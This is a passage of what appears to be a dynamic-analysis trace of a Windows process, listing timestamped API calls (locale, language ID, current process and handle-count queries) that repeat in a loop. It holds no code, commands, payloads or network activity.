0x2670409 [0149.603] GetThreadLocale () returned 0x409 [0149.603] GetCurrentProcess () returned 0xffffffff [0149.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.603] GetSystemDefaultLangID () returned 0x2670409 [0149.603] GetThreadLocale () returned 0x409 [0149.603] GetCurrentProcess () returned 0xffffffff [0149.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.603] GetSystemDefaultLangID () returned 0x2670409 [0149.603] GetThreadLocale () returned 0x409 [0149.603] GetCurrentProcess () returned 0xffffffff [0149.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.604] GetSystemDefaultLangID () returned 0x2670409 [0149.604] GetThreadLocale () returned 0x409 [0149.604] GetCurrentProcess () returned 0xffffffff [0149.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.604] GetSystemDefaultLangID () returned 0x2670409 [0149.604] GetThreadLocale () returned 0x409 [0149.604] GetCurrentProcess () returned 0xffffffff [0149.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.605] GetSystemDefaultLangID () returned 0x2670409 [0149.605] GetThreadLocale () returned 0x409 [0149.605] GetCurrentProcess () returned 0xffffffff [0149.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.605] GetSystemDefaultLangID () returned 0x2670409 [0149.605] GetThreadLocale () returned 0x409 [0149.605] GetCurrentProcess () returned 0xffffffff [0149.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.605] GetSystemDefaultLangID () returned 0x2670409 [0149.605] GetThreadLocale () returned 0x409 [0149.605] GetCurrentProcess () returned 0xffffffff [0149.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.605] GetSystemDefaultLangID () returned 0x2670409 [0149.605] GetThreadLocale () returned 0x409 [0149.605] GetCurrentProcess () returned 0xffffffff [0149.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.605] GetSystemDefaultLangID () returned 0x2670409 [0149.605] GetThreadLocale () returned 0x409 [0149.605] GetCurrentProcess () returned 0xffffffff [0149.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.605] GetSystemDefaultLangID () returned 0x2670409 [0149.605] GetThreadLocale () returned 0x409 [0149.605] GetCurrentProcess () returned 0xffffffff [0149.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.605] GetSystemDefaultLangID () returned 0x2670409 [0149.605] GetThreadLocale () returned 0x409 [0149.605] GetCurrentProcess () returned 0xffffffff [0149.606] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.606] GetSystemDefaultLangID () returned 0x2670409 [0149.606] GetThreadLocale () returned 0x409 [0149.606] GetCurrentProcess () returned 0xffffffff [0149.606] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.606] GetSystemDefaultLangID () returned 0x2670409 [0149.606] GetThreadLocale () returned 0x409 [0149.606] GetCurrentProcess () returned 0xffffffff [0149.606] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.606] GetSystemDefaultLangID () returned 0x2670409 [0149.606] GetThreadLocale () returned 0x409 [0149.606] GetCurrentProcess () returned 0xffffffff [0149.606] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.606] GetSystemDefaultLangID () returned 0x2670409 [0149.606] GetThreadLocale () returned 0x409 [0149.606] GetCurrentProcess () returned 0xffffffff [0149.606] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.606] GetSystemDefaultLangID () returned 0x2670409 [0149.606] GetThreadLocale () returned 0x409 [0149.606] GetCurrentProcess () returned 0xffffffff [0149.606] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.606] GetSystemDefaultLangID () returned 0x2670409 [0149.606] GetThreadLocale () returned 0x409 [0149.606] GetCurrentProcess () returned 0xffffffff [0149.606] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.606] GetSystemDefaultLangID () returned 0x2670409 [0149.606] GetThreadLocale () returned 0x409 [0149.607] GetCurrentProcess () returned 0xffffffff [0149.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.607] GetSystemDefaultLangID () returned 0x2670409 [0149.607] GetThreadLocale () returned 0x409 [0149.607] GetCurrentProcess () returned 0xffffffff [0149.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.607] GetSystemDefaultLangID () returned 0x2670409 [0149.607] GetThreadLocale () returned 0x409 [0149.607] GetCurrentProcess () returned 0xffffffff [0149.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.607] GetSystemDefaultLangID () returned 0x2670409 [0149.607] GetThreadLocale () returned 0x409 [0149.607] GetCurrentProcess () returned 0xffffffff [0149.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.607] GetSystemDefaultLangID () returned 0x2670409 [0149.607] GetThreadLocale () returned 0x409 [0149.607] GetCurrentProcess () returned 0xffffffff [0149.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.607] GetSystemDefaultLangID () returned 0x2670409 [0149.607] GetThreadLocale () returned 0x409 [0149.607] GetCurrentProcess () returned 0xffffffff [0149.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.607] GetSystemDefaultLangID () returned 0x2670409 [0149.607] GetThreadLocale () returned 0x409 [0149.607] GetCurrentProcess () returned 0xffffffff [0149.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.607] GetSystemDefaultLangID () returned 0x2670409 [0149.607] GetThreadLocale () returned 0x409 [0149.607] GetCurrentProcess () returned 0xffffffff [0149.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.607] GetSystemDefaultLangID () returned 0x2670409 [0149.607] GetThreadLocale () returned 0x409 [0149.607] GetCurrentProcess () returned 0xffffffff [0149.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.608] GetSystemDefaultLangID () returned 0x2670409 [0149.608] GetThreadLocale () returned 0x409 [0149.608] GetCurrentProcess () returned 0xffffffff [0149.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.608] GetSystemDefaultLangID () returned 0x2670409 [0149.608] GetThreadLocale () returned 0x409 [0149.608] GetCurrentProcess () returned 0xffffffff [0149.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.608] GetSystemDefaultLangID () returned 0x2670409 [0149.608] GetThreadLocale () returned 0x409 [0149.608] GetCurrentProcess () returned 0xffffffff [0149.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.608] GetSystemDefaultLangID () returned 0x2670409 [0149.608] GetThreadLocale () returned 0x409 [0149.608] GetCurrentProcess () returned 0xffffffff [0149.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.608] GetSystemDefaultLangID () returned 0x2670409 [0149.608] GetThreadLocale () returned 0x409 [0149.608] GetCurrentProcess () returned 0xffffffff [0149.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.608] GetSystemDefaultLangID () returned 0x2670409 [0149.608] GetThreadLocale () returned 0x409 [0149.608] GetCurrentProcess () returned 0xffffffff [0149.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.608] GetSystemDefaultLangID () returned 0x2670409 [0149.608] GetThreadLocale () returned 0x409 [0149.608] GetCurrentProcess () returned 0xffffffff [0149.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.608] GetSystemDefaultLangID () returned 0x2670409 [0149.608] GetThreadLocale () returned 0x409 [0149.608] GetCurrentProcess () returned 0xffffffff [0149.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.609] GetSystemDefaultLangID () returned 0x2670409 [0149.609] GetThreadLocale () returned 0x409 [0149.609] GetCurrentProcess () returned 0xffffffff [0149.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.609] GetSystemDefaultLangID () returned 0x2670409 [0149.609] GetThreadLocale () returned 0x409 [0149.609] GetCurrentProcess () returned 0xffffffff [0149.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.609] GetSystemDefaultLangID () returned 0x2670409 [0149.609] GetThreadLocale () returned 0x409 [0149.609] GetCurrentProcess () returned 0xffffffff [0149.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.609] GetSystemDefaultLangID () returned 0x2670409 [0149.609] GetThreadLocale () returned 0x409 [0149.609] GetCurrentProcess () returned 0xffffffff [0149.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.609] GetSystemDefaultLangID () returned 0x2670409 [0149.609] GetThreadLocale () returned 0x409 [0149.609] GetCurrentProcess () returned 0xffffffff [0149.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.609] GetSystemDefaultLangID () returned 0x2670409 [0149.609] GetThreadLocale () returned 0x409 [0149.609] GetCurrentProcess () returned 0xffffffff [0149.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.609] GetSystemDefaultLangID () returned 0x2670409 [0149.609] GetThreadLocale () returned 0x409 [0149.609] GetCurrentProcess () returned 0xffffffff [0149.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.609] GetSystemDefaultLangID () returned 0x2670409 [0149.609] GetThreadLocale () returned 0x409 [0149.609] GetCurrentProcess () returned 0xffffffff [0149.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.610] GetSystemDefaultLangID () returned 0x2670409 [0149.610] GetThreadLocale () returned 0x409 [0149.610] GetCurrentProcess () returned 0xffffffff [0149.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.610] GetSystemDefaultLangID () returned 0x2670409 [0149.610] GetThreadLocale () returned 0x409 [0149.610] GetCurrentProcess () returned 0xffffffff [0149.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.610] GetSystemDefaultLangID () returned 0x2670409 [0149.610] GetThreadLocale () returned 0x409 [0149.610] GetCurrentProcess () returned 0xffffffff [0149.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.610] GetSystemDefaultLangID () returned 0x2670409 [0149.610] GetThreadLocale () returned 0x409 [0149.610] GetCurrentProcess () returned 0xffffffff [0149.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.610] GetSystemDefaultLangID () returned 0x2670409 [0149.610] GetThreadLocale () returned 0x409 [0149.610] GetCurrentProcess () returned 0xffffffff [0149.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.610] GetSystemDefaultLangID () returned 0x2670409 [0149.610] GetThreadLocale () returned 0x409 [0149.610] GetCurrentProcess () returned 0xffffffff [0149.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.610] GetSystemDefaultLangID () returned 0x2670409 [0149.610] GetThreadLocale () returned 0x409 [0149.610] GetCurrentProcess () returned 0xffffffff [0149.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.611] GetSystemDefaultLangID () returned 0x2670409 [0149.611] GetThreadLocale () returned 0x409 [0149.611] GetCurrentProcess () returned 0xffffffff [0149.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.611] GetSystemDefaultLangID () returned 0x2670409 [0149.611] GetThreadLocale () returned 0x409 [0149.611] GetCurrentProcess () returned 0xffffffff [0149.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.611] GetSystemDefaultLangID () returned 0x2670409 [0149.611] GetThreadLocale () returned 0x409 [0149.611] GetCurrentProcess () returned 0xffffffff [0149.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.611] GetSystemDefaultLangID () returned 0x2670409 [0149.611] GetThreadLocale () returned 0x409 [0149.611] GetCurrentProcess () returned 0xffffffff [0149.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.611] GetSystemDefaultLangID () returned 0x2670409 [0149.611] GetThreadLocale () returned 0x409 [0149.611] GetCurrentProcess () returned 0xffffffff [0149.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.611] GetSystemDefaultLangID () returned 0x2670409 [0149.611] GetThreadLocale () returned 0x409 [0149.611] GetCurrentProcess () returned 0xffffffff [0149.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.611] GetSystemDefaultLangID () returned 0x2670409 [0149.611] GetThreadLocale () returned 0x409 [0149.611] GetCurrentProcess () returned 0xffffffff [0149.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.611] GetSystemDefaultLangID () returned 0x2670409 [0149.611] GetThreadLocale () returned 0x409 [0149.611] GetCurrentProcess () returned 0xffffffff [0149.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.612] GetSystemDefaultLangID () returned 0x2670409 [0149.612] GetThreadLocale () returned 0x409 [0149.612] GetCurrentProcess () returned 0xffffffff [0149.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.612] GetSystemDefaultLangID () returned 0x2670409 [0149.612] GetThreadLocale () returned 0x409 [0149.612] GetCurrentProcess () returned 0xffffffff [0149.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.612] GetSystemDefaultLangID () returned 0x2670409 [0149.612] GetThreadLocale () returned 0x409 [0149.612] GetCurrentProcess () returned 0xffffffff [0149.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.612] GetSystemDefaultLangID () returned 0x2670409 [0149.612] GetThreadLocale () returned 0x409 [0149.612] GetCurrentProcess () returned 0xffffffff [0149.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.612] GetSystemDefaultLangID () returned 0x2670409 [0149.612] GetThreadLocale () returned 0x409 [0149.612] GetCurrentProcess () returned 0xffffffff [0149.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.612] GetSystemDefaultLangID () returned 0x2670409 [0149.612] GetThreadLocale () returned 0x409 [0149.612] GetCurrentProcess () returned 0xffffffff [0149.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.612] GetSystemDefaultLangID () returned 0x2670409 [0149.612] GetThreadLocale () returned 0x409 [0149.612] GetCurrentProcess () returned 0xffffffff [0149.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.612] GetSystemDefaultLangID () returned 0x2670409 [0149.612] GetThreadLocale () returned 0x409 [0149.612] GetCurrentProcess () returned 0xffffffff [0149.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.613] GetSystemDefaultLangID () returned 0x2670409 [0149.613] GetThreadLocale () returned 0x409 [0149.613] GetCurrentProcess () returned 0xffffffff [0149.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.613] GetSystemDefaultLangID () returned 0x2670409 [0149.613] GetThreadLocale () returned 0x409 [0149.613] GetCurrentProcess () returned 0xffffffff [0149.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.613] GetSystemDefaultLangID () returned 0x2670409 [0149.613] GetThreadLocale () returned 0x409 [0149.613] GetCurrentProcess () returned 0xffffffff [0149.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.613] GetSystemDefaultLangID () returned 0x2670409 [0149.613] GetThreadLocale () returned 0x409 [0149.613] GetCurrentProcess () returned 0xffffffff [0149.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.613] GetSystemDefaultLangID () returned 0x2670409 [0149.613] GetThreadLocale () returned 0x409 [0149.613] GetCurrentProcess () returned 0xffffffff [0149.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.613] GetSystemDefaultLangID () returned 0x2670409 [0149.613] GetThreadLocale () returned 0x409 [0149.613] GetCurrentProcess () returned 0xffffffff [0149.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.613] GetSystemDefaultLangID () returned 0x2670409 [0149.613] GetThreadLocale () returned 0x409 [0149.613] GetCurrentProcess () returned 0xffffffff [0149.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.613] GetSystemDefaultLangID () returned 0x2670409 [0149.613] GetThreadLocale () returned 0x409 [0149.613] GetCurrentProcess () returned 0xffffffff [0149.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.613] GetSystemDefaultLangID () returned 0x2670409 [0149.614] GetThreadLocale () returned 0x409 [0149.614] GetCurrentProcess () returned 0xffffffff [0149.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.614] GetSystemDefaultLangID () returned 0x2670409 [0149.614] GetThreadLocale () returned 0x409 [0149.614] GetCurrentProcess () returned 0xffffffff [0149.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.614] GetSystemDefaultLangID () returned 0x2670409 [0149.614] GetThreadLocale () returned 0x409 [0149.614] GetCurrentProcess () returned 0xffffffff [0149.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.614] GetSystemDefaultLangID () returned 0x2670409 [0149.614] GetThreadLocale () returned 0x409 [0149.614] GetCurrentProcess () returned 0xffffffff [0149.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.614] GetSystemDefaultLangID () returned 0x2670409 [0149.614] GetThreadLocale () returned 0x409 [0149.614] GetCurrentProcess () returned 0xffffffff [0149.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.614] GetSystemDefaultLangID () returned 0x2670409 [0149.614] GetThreadLocale () returned 0x409 [0149.614] GetCurrentProcess () returned 0xffffffff [0149.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.614] GetSystemDefaultLangID () returned 0x2670409 [0149.614] GetThreadLocale () returned 0x409 [0149.614] GetCurrentProcess () returned 0xffffffff [0149.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.614] GetSystemDefaultLangID () returned 0x2670409 [0149.614] GetThreadLocale () returned 0x409 [0149.614] GetCurrentProcess () returned 0xffffffff [0149.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.615] GetSystemDefaultLangID () returned 0x2670409 [0149.615] GetThreadLocale () returned 0x409 [0149.615] GetCurrentProcess () returned 0xffffffff [0149.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.615] GetSystemDefaultLangID () returned 0x2670409 [0149.615] GetThreadLocale () returned 0x409 [0149.615] GetCurrentProcess () returned 0xffffffff [0149.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.615] GetSystemDefaultLangID () returned 0x2670409 [0149.615] GetThreadLocale () returned 0x409 [0149.615] GetCurrentProcess () returned 0xffffffff [0149.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.615] GetSystemDefaultLangID () returned 0x2670409 [0149.615] GetThreadLocale () returned 0x409 [0149.615] GetCurrentProcess () returned 0xffffffff [0149.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.615] GetSystemDefaultLangID () returned 0x2670409 [0149.615] GetThreadLocale () returned 0x409 [0149.615] GetCurrentProcess () returned 0xffffffff [0149.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.615] GetSystemDefaultLangID () returned 0x2670409 [0149.615] GetThreadLocale () returned 0x409 [0149.615] GetCurrentProcess () returned 0xffffffff [0149.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.615] GetSystemDefaultLangID () returned 0x2670409 [0149.615] GetThreadLocale () returned 0x409 [0149.615] GetCurrentProcess () returned 0xffffffff [0149.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.615] GetSystemDefaultLangID () returned 0x2670409 [0149.615] GetThreadLocale () returned 0x409 [0149.615] GetCurrentProcess () returned 0xffffffff [0149.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.616] GetSystemDefaultLangID () returned 0x2670409 [0149.616] GetThreadLocale () returned 0x409 [0149.616] GetCurrentProcess () returned 0xffffffff [0149.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.616] GetSystemDefaultLangID () returned 0x2670409 [0149.616] GetThreadLocale () returned 0x409 [0149.616] GetCurrentProcess () returned 0xffffffff [0149.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.616] GetSystemDefaultLangID () returned 0x2670409 [0149.616] GetThreadLocale () returned 0x409 [0149.616] GetCurrentProcess () returned 0xffffffff [0149.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.616] GetSystemDefaultLangID () returned 0x2670409 [0149.616] GetThreadLocale () returned 0x409 [0149.616] GetCurrentProcess () returned 0xffffffff [0149.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.616] GetSystemDefaultLangID () returned 0x2670409 [0149.616] GetThreadLocale () returned 0x409 [0149.616] GetCurrentProcess () returned 0xffffffff [0149.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.616] GetSystemDefaultLangID () returned 0x2670409 [0149.616] GetThreadLocale () returned 0x409 [0149.616] GetCurrentProcess () returned 0xffffffff [0149.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.616] GetSystemDefaultLangID () returned 0x2670409 [0149.616] GetThreadLocale () returned 0x409 [0149.616] GetCurrentProcess () returned 0xffffffff [0149.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.616] GetSystemDefaultLangID () returned 0x2670409 [0149.616] GetThreadLocale () returned 0x409 [0149.616] GetCurrentProcess () returned 0xffffffff [0149.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.616] GetSystemDefaultLangID () returned 0x2670409 [0149.616] GetThreadLocale () returned 0x409 [0149.616] GetCurrentProcess () returned 0xffffffff [0149.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.617] GetSystemDefaultLangID () returned 0x2670409 [0149.617] GetThreadLocale () returned 0x409 [0149.617] GetCurrentProcess () returned 0xffffffff [0149.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.617] GetSystemDefaultLangID () returned 0x2670409 [0149.617] GetThreadLocale () returned 0x409 [0149.617] GetCurrentProcess () returned 0xffffffff [0149.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.617] GetSystemDefaultLangID () returned 0x2670409 [0149.617] GetThreadLocale () returned 0x409 [0149.617] GetCurrentProcess () returned 0xffffffff [0149.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.617] GetSystemDefaultLangID () returned 0x2670409 [0149.617] GetThreadLocale () returned 0x409 [0149.617] GetCurrentProcess () returned 0xffffffff [0149.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.617] GetSystemDefaultLangID () returned 0x2670409 [0149.617] GetThreadLocale () returned 0x409 [0149.617] GetCurrentProcess () returned 0xffffffff [0149.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.617] GetSystemDefaultLangID () returned 0x2670409 [0149.617] GetThreadLocale () returned 0x409 [0149.617] GetCurrentProcess () returned 0xffffffff [0149.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.617] GetSystemDefaultLangID () returned 0x2670409 [0149.617] GetThreadLocale () returned 0x409 [0149.617] GetCurrentProcess () returned 0xffffffff [0149.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.617] GetSystemDefaultLangID () returned 0x2670409 [0149.617] GetThreadLocale () returned 0x409 [0149.617] GetCurrentProcess () returned 0xffffffff [0149.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.618] GetSystemDefaultLangID () returned 0x2670409 [0149.618] GetThreadLocale () returned 0x409 [0149.618] GetCurrentProcess () returned 0xffffffff [0149.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.618] GetSystemDefaultLangID () returned 0x2670409 [0149.618] GetThreadLocale () returned 0x409 [0149.618] GetCurrentProcess () returned 0xffffffff [0149.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.618] GetSystemDefaultLangID () returned 0x2670409 [0149.618] GetThreadLocale () returned 0x409 [0149.618] GetCurrentProcess () returned 0xffffffff [0149.618] 